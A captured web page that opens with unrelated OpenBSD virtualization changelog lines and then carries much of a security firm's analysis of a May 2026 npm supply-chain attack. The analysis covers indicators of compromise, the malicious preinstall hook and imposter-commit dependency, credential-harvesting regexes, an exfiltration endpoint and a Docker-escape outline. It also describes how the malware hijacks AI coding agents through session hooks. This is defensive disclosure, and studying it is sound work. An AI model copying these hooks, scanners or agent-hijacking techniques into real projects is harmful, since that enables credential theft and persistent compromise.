Fixed a seg­fault in vmd(8) dur­ing vmmci time­out fir­ing.

Enabled 32-bit di­rect ker­nel launch for both amd64 and i386 in vmd(8).

Fixed a race in vmd(8) vm pause bar­rier us­age.

Fixed a race in vmm(4) vm ter­mi­na­tion path.

Added em­u­la­tion of AMD SysCfg MSR in vmm(4).

Made OpenBSD work on Apple Virtualization.

Only ex­pose pv­clock(4) in vmm(4) if tsc fre­quency is known.

Reduced vmd(8) lowmem area in the mem­ory map to help Linux guest re­boot is­sues.

Mini Shai-Hulud Strikes Again: 317 npm Packages Compromised

safedep.io

SafeDep Team

• May 19, 2026 • 28 min read

Table of Contents

TL;DR

The npm ac­count atool ([email protected]) was com­pro­mised on May 19, 2026. The at­tacker pub­lished 637 ma­li­cious ver­sions across 317 pack­ages in a 22-minute au­to­mated burst. Affected pack­ages in­clude size-sen­sor (4.2M down­loads/​month), echarts-for-re­act (3.8M), @antv/scale (2.2M), timeago.js (1.15M), and hun­dreds of @antv scoped pack­ages. The pay­load is a 498KB ob­fus­cated Bun script that matches the Mini Shai-Hulud toolkit used in the SAP com­pro­mise three weeks ear­lier: same scan­ner ar­chi­tec­ture, same cre­den­tial regex set, same ob­fus­ca­tion pat­tern. It har­vests cre­den­tials across the full AWS chain (env vars, con­fig files, EC2 IMDS, ECS con­tainer meta­data, Secrets Manager), Kubernetes ser­vice ac­count to­kens, HashiCorp Vault, GitHub PATs, npm to­kens, SSH keys, and lo­cal pass­word man­ager vaults (1Password, Bitwarden, pass, gopass). Stolen data is ex­fil­trated through two par­al­lel chan­nels: Git ob­jects com­mit­ted to pub­lic GitHub repos­i­to­ries cre­ated un­der the com­pro­mised to­ken (User-Agent forged as python-re­quests/​2.31.0), and RSA+AES en­crypted HTTPS POSTs to t.m-kosche[.]com dis­guised as OpenTelemetry trace data. In CI en­vi­ron­ments, the pay­load ex­changes GitHub Actions OIDC to­kens for npm pub­lish to­kens, signs ar­ti­facts via Sigstore (Fulcio + Rekor) us­ing the stolen iden­tity, and in­jects per­sis­tence into .github/workflows/codeql.yml. The pay­load hi­jacks Claude Code and Codex by in­ject­ing SessionStart hooks that re-ex­e­cute the mal­ware on every AI ses­sion, both lo­cally and via com­mits to ac­ces­si­ble GitHub repos­i­to­ries. VS Code gets a tasks.json with runOn”: folderOpen” for the same ef­fect. A per­sis­tent sys­temd ser­vice / ma­cOS LaunchAgent (kitty-monitor) in­stalls a GitHub dead-drop C2 back­door: a Python dae­mon that polls GitHub’s com­mit search API hourly for RSA-PSS signed com­mands in com­mit mes­sages con­tain­ing the key­word firedalazer, then down­loads and ex­e­cutes ar­bi­trary Python from the signed URL. A sep­a­rate gh-to­ken-mon­i­tor dae­mon polls stolen GitHub to­kens at 60-second in­ter­vals. The pay­load also at­tempts Docker con­tainer es­cape via the host socket and prop­a­gates in­fec­tion to other lo­cal Node.js pro­jects.

The at­tack uses two ex­e­cu­tion paths. Each com­pro­mised ver­sion adds a pre­in­stall hook (bun run in­dex.js). 630 of 637 ver­sions also in­ject an op­tion­alDe­pen­den­cies en­try point­ing to im­poster com­mits in the antvis/​G2 GitHub repos­i­tory. These are or­phan com­mits with forged au­thor­ship, in­vis­i­ble in the re­po’s branch his­tory, ex­ploit­ing GitHub’s fork ob­ject shar­ing to host a sec­ond copy of the pay­load with­out any write ac­cess to the tar­get repos­i­tory. npm’s github: de­pen­dency res­o­lu­tion fetches and ex­e­cutes the con­tent by SHA.

Jump to full list of com­pro­mised pack­ages

Impact:

Projects us­ing semver ranges (e.g., ^3.0.6 for echarts-for-re­act) auto-re­solve to com­pro­mised ver­sions

Credential har­vest­ing tar­gets npm to­kens, GitHub PATs, AWS keys (full cre­den­tial chain in­clud­ing EC2 meta­data and ECS con­tainer cre­den­tials), GCP ser­vice ac­counts, Azure cre­den­tials, data­base con­nec­tion strings, Stripe keys, Slack to­kens, SSH keys, Docker auth, Kubernetes ser­vice ac­count to­kens, HashiCorp Vault to­kens, and lo­cal pass­word man­ager vaults (1Password, Bitwarden, pass, gopass)

Dual ex­fil­tra­tion: stolen data is com­mit­ted as Git ob­jects to pub­lic GitHub repos­i­to­ries (User-Agent python-re­quests/​2.31.0) and sent as RSA+AES en­crypted HTTPS POSTs to hxxps://​t.m-kosche[.]com/​api/​pub­lic/​otel/​v1/​traces (disguised as OpenTelemetry traces)

npm OIDC to­ken ex­change in CI al­lows the at­tacker to ob­tain pub­lish to­kens us­ing the pipeline’s own iden­tity

Sigstore sign­ing with stolen OIDC to­kens cre­ates le­git­i­mately-signed ar­ti­facts with forged prove­nance

Docker socket ac­cess en­ables priv­i­leged con­tainer es­cape with host filesys­tem bind mounts

CI/CD per­sis­tence via .github/workflows/codeql.yml in­jec­tion (named Run Copilot”) that dumps to­J­SON(se­crets) as a GitHub Actions ar­ti­fact, then self-cleans by delet­ing the work­flow run and re­set­ting the branch

AI agent hi­jack­ing: Claude Code SessionStart hooks, Codex hooks, and VS Code runOn”: folderOpen” tasks, all trig­ger­ing a Bun boot­strap­per that re-ex­e­cutes the pay­load

Persistent sys­temd user ser­vices and ma­cOS LaunchAgents: kitty-mon­i­tor runs a GitHub dead-drop C2 back­door that ac­cepts RSA-signed re­mote com­mands via GitHub com­mit search; gh-to­ken-mon­i­tor polls stolen to­kens at 60-second in­ter­vals

Local pro­ject in­fec­tion copies pay­load files and hooks into other Node.js pro­jects on the same ma­chine

Redundant pay­load de­liv­ery via GitHub im­poster com­mits sur­vives even if pre­in­stall hooks are blocked

Indicators of Compromise (IoC):

Any pack­age pub­lished by atool ([email protected]) on 2026 – 05-19 be­tween 01:44 and 02:06 UTC

pre­in­stall script: bun run in­dex.js

Payload SHA256: a68d­d1e6a6e35ec3771e1f94fe796f55d­fe65a2b94560516f­f4ac189390d­fa1c

Imposter com­mits in antvis/​G2 (orphan, forged au­thor, mes­sage: New Package”):1916faa365f2788b6e193514872d51a242876569 (626 ver­sions)7cb42f57561c321ecb09b4552802ae0ac55b3a7a (2 ver­sions)dc3d62a2181be­b9f326952a2d212900c94f2e13d (1 ver­sion, garbage col­lected)

1916faa365f2788b6e193514872d51a242876569 (626 ver­sions)

7cb42f57561c321ecb09b4552802ae0ac55b3a7a (2 ver­sions)

dc3d62a2181be­b9f326952a2d212900c94f2e13d (1 ver­sion, garbage col­lected)

Optional de­pen­dency: @antv/setup: github:antvis/​G2#<com­mit-sha>

Exfiltration repos­i­to­ries match­ing the Dune-themed nam­ing pat­tern {word1}-{word2}-{number} where word1 is one of: sar­daukar, men­tat, fre­men, atrei­des, harkon­nen, gesserit, pre­scient, fe­daykin, tleilaxu, siri­dar, kanly, sayyad­ina, ghola, powin­dah, prana, kral­izec; word2 is one of: sand­worm, or­nithopter, heigh­liner, still­suit, las­gun, si­etch, melange, thumper, nav­i­ga­tor, fe­daykin, fu­tar, phib­ian, slig, cog­i­tor, laza, ghola; num­ber is 0 – 999. Description: Shai-Hulud: Here We Go Again” (reversed in source)

HTTPS ex­fil­tra­tion to hxxps://​t.m-kosche[.]com/​api/​pub­lic/​otel/​v1/​traces (RSA+AES en­crypted, dis­guised as OpenTelemetry traces)

HTTP re­quests to 169.254.169.254 (EC2 meta­data) and 169.254.170.2 (ECS con­tainer meta­data)

Branches named chore/​add-cod­eql-sta­tic-analy­sis in repos­i­to­ries ac­ces­si­ble to com­pro­mised to­kens

.github/workflows/codeql.yml with work­flow name Run Copilot that dumps to­J­SON(se­crets) to for­mat-re­sults.txt

.claude/settings.json con­tain­ing SessionStart hooks run­ning node .claude/setup.mjs

.vscode/tasks.json with runOn”: folderOpen” tasks call­ing .claude/setup.mjs

.claude/setup.mjs or .vscode/setup.mjs (Bun boot­strap­per, down­loads bun v1.3.14 from GitHub)

Systemd user ser­vice kitty-mon­i­tor.ser­vice or LaunchAgent com.user.kitty-mon­i­tor.plist

gh-to­ken-mon­i­tor dae­mon at ~/.local/bin/gh-token-monitor.sh

Files at ~/.local/share/kitty/cat.py (GitHub dead-drop C2 back­door)

State file /var/tmp/.gh_update_state (C2 ex­e­cu­tion track­ing)

GitHub com­mits con­tain­ing the key­word firedalazer (C2 com­mand trig­ger)

RSA-PSS signed com­mands in com­mit mes­sages: firedalazer <base64_url>.<base64_signature>

If you are au­dit­ing lock­files or re­in­stalling on af­fected ma­chines, Package Manager Guard (pmg) is an open-source in­stall proxy that eval­u­ates pack­ages against threat in­tel­li­gence be­fore pre­in­stall scripts run. Its de­pen­dency cooldown can refuse ver­sions pub­lished in­side a con­fig­urable win­dow, which helps against bursts like the May 19 wave where semver ranges were still re­solv­ing to freshly pub­lished ma­li­cious re­leases.

Analysis

Account Compromise and Blast Radius

The atool npm ac­count main­tains 547 pack­ages. The at­tacker pub­lished 637 ma­li­cious ver­sions across 314 of those pack­ages in two au­to­mated waves, both on May 19, 2026:

Most pack­ages (309) re­ceived ex­actly 2 ma­li­cious ver­sions, one per wave. Four pack­ages (size-sensor, echarts-for-re­act, jest-can­vas-mock, jest-date-mock) re­ceived 3 ver­sions, sug­gest­ing they were used for early test­ing be­fore the bulk pub­lish.

A sam­ple of the high­est-im­pact af­fected pack­ages:

The at­tacker did not move the lat­est dist-tag on most pack­ages. For echarts-for-re­act, lat­est still points to 3.0.6. This pro­vides no pro­tec­tion: npm’s semver res­o­lu­tion picks the high­est ver­sion match­ing a range, re­gard­less of the lat­est tag. Any pro­ject with echarts-for-react”: ^3.0.6″ in its pack­age.json re­solves to 3.2.7 (malicious) on the next clean in­stall.

Execution Trigger

Every com­pro­mised ver­sion makes ex­actly two changes to pack­age.json:

// pack­age.json diff (size-sensor 1.0.3 → 1.1.4) version”: 1.0.3″, version”: 1.1.4″, scripts”: { … build”: npm run build:umd && npm run build:lib && limit-size” build”: npm run build:umd && npm run build:lib && limit-size”, preinstall”: bun run in­dex.js” }, optionalDependencies”: { @antv/setup”: github:antvis/G2#1916faa365f2788b6e193514872d51a242876569″ },

// pack­age.json diff (size-sensor 1.0.3 → 1.1.4)

version”: 1.0.3″,

version”: 1.1.4″,

scripts”: {

build”: npm run build:umd && npm run build:lib && limit-size”

build”: npm run build:umd && npm run build:lib && limit-size”,

preinstall”: bun run in­dex.js”

},

optionalDependencies”: {

@antv/setup”: github:antvis/G2#1916faa365f2788b6e193514872d51a242876569″

},

The pre­in­stall hook runs be­fore any de­pen­dency in­stal­la­tion and re­quires Bun as the run­time. 630 of the 637 ma­li­cious ver­sions also in­ject an op­tion­alDe­pen­den­cies en­try that de­liv­ers a sec­ond copy of the pay­load via the le­git­i­mate antvis/​G2 GitHub repos­i­tory (see Imposter Commits in antvis/​G2 be­low).

Malicious Payload

The in­dex.js file is a sin­gle-line, 498KB ob­fus­cated Bun bun­dle. The struc­ture is a di­rect match with the Mini Shai-Hulud pay­load from the SAP com­pro­mise three weeks ear­lier: same Bun run­time re­quire­ment, same hex-vari­able ob­fus­ca­tion pat­tern, same scan­ner ar­chi­tec­ture with a 100KB flush thresh­old, same cre­den­tial regex set. The pay­load uses two lay­ers of ob­fus­ca­tion: a hex-vari­able string lookup table (_0x1169 re­solv­ing from ar­ray _0x5e03) and an en­crypted string de­coder (fc2edea72) that uses base64 + XOR for all sen­si­tive strings like en­vi­ron­ment vari­able names, file paths, and C2 URLs.

The im­ports re­veal the full scope of ca­pa­bil­i­ties:

// in­dex.js — ex­tracted im­port state­mentsim­port { ex­ec­Sync } from child_process’;import { spawn } from child_process’;import { home­dir } from os’;import { read­File, read­File­Sync, write­File­Sync, cre­ateWriteStream } from fs’;import { cre­ate­Hash, cre­at­eDe­ci­pheriv, pbkd­f2­Sync, gen­er­ateKey­Pair­Sync, sign } from crypto’;import { pipeline } from stream/promises’;

// in­dex.js — ex­tracted im­port state­ments

im­port { ex­ec­Sync } from child_process’;

im­port { spawn } from child_process’;

im­port { home­dir } from os’;

im­port { read­File, read­File­Sync, write­File­Sync, cre­ateWriteStream } from fs’;

im­port { cre­ate­Hash, cre­at­eDe­ci­pheriv, pbkd­f2­Sync, gen­er­ateKey­Pair­Sync, sign } from crypto’;

im­port { pipeline } from stream/promises’;

The pay­load’s main func­tion J2() or­ches­trates the at­tack through a scan­ner ar­chi­tec­ture. It in­stan­ti­ates mul­ti­ple scan­ner classes, each tar­get­ing a dif­fer­ent cre­den­tial type, and dis­patches re­sults through a batched sender (Po) with a 100KB flush thresh­old. A CI en­vi­ron­ment de­tec­tion mod­ule checks for 20+ plat­forms via en­vi­ron­ment vari­ables: GitHub Actions (GITHUB_ACTIONS), Jenkins (JENKINS_URL, JENKINS_HOME), GitLab CI (GITLAB_CI), CircleCI (CIRCLECI), Travis (TRAVIS), Buildkite (BUILDKITE), Drone (DRONE), TeamCity (TEAMCITY_VERSION), AppVeyor (APPVEYOR), Bitbucket Pipelines (BITBUCKET_BUILD_NUMBER), Bitrise (BITRISE_IO), Semaphore (SEMAPHORE), CodeBuild (CODEBUILD_BUILD_ID), Azure DevOps (BUILD_BUILDURI), Cirrus CI (CIRRUS_CI), Netlify (NETLIFY), Vercel (VERCEL), CF Pages (CF_PAGES), Buddy (BUDDY_WORKSPACE_ID), Vela (VELA), Screwdriver (SCREWDRIVER), SailCI (SAILCI), Wercker (WERCKER_MAIN_PIPELINE_STARTED), Shippable (SHIPPABLE), Distelli (DISTELLI_APPNAME), and JetBrains Space (JB_SPACE_EXECUTION_NUMBER). When run­ning in GitHub Actions, ad­di­tional data col­lec­tion ac­ti­vates: work­flow runs, ar­ti­facts, se­crets meta­data, and OIDC to­ken ex­change.

Credential Harvesting

The pay­load reads 80+ en­vi­ron­ment vari­ables (all names en­crypted via fc2edea72) and scans file con­tents us­ing regex pat­terns. The regex set re­veals what the at­tacker is af­ter:

// in­dex.js — cre­den­tial de­tec­tion pat­terns (extracted from scan­ner classes)‘ghto­ken’: /gh[op]_[A-Za-z0 – 9]{36,}/g,‘npmtoken’: /npm_[A-Za-z0 – 9]{36,}/g,‘ghs_jwt’: /ghs_\d+_[A-Za-z0 – 9_-]+\.[A-Za-z0 – 9_-]+\.[A-Za-z0 – 9_-]+/g,‘awskey’: /(AKIA[0 – 9A-Z]{16}|aws_access_key_id[“\s:=]+[“’]?[A-Z0 – 9]{20})/g,‘gcpKey’: /* en­crypted — tar­gets GCP ser­vice ac­count keys */,‘azureKey’: /(AccountKey|accessKey|client_secret)[“\s:=]+[“’]?[A-Za-z0 – 9+/=]{40,}/gi,‘dbConnStr’:/(mongodb|mysql|postgresql|postgres|redis):\/\/[^:\s]+:[^@\s]+@[^\s’“]+/gi,‘stripeKey’:/(sk|pk)_(test|live)_[0 – 9a-zA-Z]{24,}/g,‘slackToken’: /* en­crypted */,‘sshKey’: /ssh-(rsa|ed25519|dss) AAAA[0 – 9A-Za-z+\/]{100,}/g,‘dockerAuth’:/“auth”:\s*“[A-Za-z0 – 9+\/=]{20,}“/g,‘vaultToken’:/hvs\.[A-Za-z0 – 9_-]{24,}/g,‘k8stoken’: /eyJhbGciOiJSUzI1NiIsImtpZCI6[\w\-\.]+/g,‘urlCred’: /https?:\/\/[^:“‘\s]+:[^@“‘\s]+@[^\s’“\]]+/g

// in­dex.js — cre­den­tial de­tec­tion pat­terns (extracted from scan­ner classes)

ghtoken’: /gh[op]_[A-Za-z0 – 9]{36,}/g,

npmtoken’: /npm_[A-Za-z0 – 9]{36,}/g,

ghs_jwt’: /ghs_\d+_[A-Za-z0 – 9_-]+\.[A-Za-z0 – 9_-]+\.[A-Za-z0 – 9_-]+/g,

awskey’: /(AKIA[0 – 9A-Z]{16}|aws_access_key_id[“\s:=]+[“’]?[A-Z0 – 9]{20})/g,

gcpKey’: /* en­crypted — tar­gets GCP ser­vice ac­count keys */,

azureKey’: /(AccountKey|accessKey|client_secret)[“\s:=]+[“’]?[A-Za-z0 – 9+/=]{40,}/gi,

dbConnStr’:/(mongodb|mysql|postgresql|postgres|redis):\/\/[^:\s]+:[^@\s]+@[^\s’“]+/gi,

stripeKey’:/(sk|pk)_(test|live)_[0 – 9a-zA-Z]{24,}/g,

slackToken’: /* en­crypted */,

sshKey’: /ssh-(rsa|ed25519|dss) AAAA[0 – 9A-Za-z+\/]{100,}/g,

dockerAuth’:/“auth”:\s*“[A-Za-z0 – 9+\/=]{20,}“/g,

vaultToken’:/hvs\.[A-Za-z0 – 9_-]{24,}/g,

k8stoken’: /eyJhbGciOiJSUzI1NiIsImtpZCI6[\w\-\.]+/g,

urlCred’: /https?:\/\/[^:“‘\s]+:[^@“‘\s]+@[^\s’“\]]+/g

The scan­ner also parses AWS STS iden­tity re­sponses, ex­tract­ing <Account> and <Arn> XML tags from GetCallerIdentity calls.

A sep­a­rate file-scan­ning class (zo) reads sen­si­tive paths from the home di­rec­tory. The tar­geted paths are en­crypted via fc2edea72, but the code ref­er­ences a LINUX key in the path map and re­solves ~ via os.home­dir(), tar­get­ing stan­dard cre­den­tial lo­ca­tions: .ssh, .aws/credentials, .npmrc, .docker/config.json, .kube/config, and sim­i­lar paths.

Docker Container Escape

The pay­load checks for the Docker socket and, if pre­sent, at­tempts con­tainer es­cape through three se­quen­tial meth­ods:

// in­dex.js — de­ob­fus­cated at­tack chaina­sync func­tion S1() { if (await P2()) re­turn true; // Direct Docker API: cre­ate con­tainer if (await W2()) re­turn true; // Docker API: cre­ate + start con­tainer if (await K2()) re­turn true; // ex­ec­Sync fall­back re­turn false;}

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

Visit pancik.com for more.